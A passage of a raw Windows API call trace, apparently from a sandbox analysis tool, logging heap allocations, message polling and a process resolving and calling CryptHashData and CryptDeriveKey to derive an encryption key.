hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0256.398] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.398] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0256.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0256.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0256.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0256.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0256.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0256.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51808, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0256.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0256.400] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0256.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0256.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.400] CryptHashData (hHash=0xa87490, pbData=0x2e54e58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0256.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0256.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.400] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0256.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0256.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.401] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0256.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0256.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0256.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0256.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0256.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0256.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0256.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0256.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0256.401] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.402] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0256.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0256.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0256.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0256.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0256.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0256.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0256.403] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0256.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0256.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0256.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0256.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0256.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0256.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0256.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0256.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0256.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0256.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e519a0 [0256.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e519a0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0256.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0256.406] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0256.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0256.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0256.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0256.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0256.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0256.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0256.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0256.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0256.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0256.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0256.474] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa874d0) returned 1 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0256.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0256.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0256.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0256.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 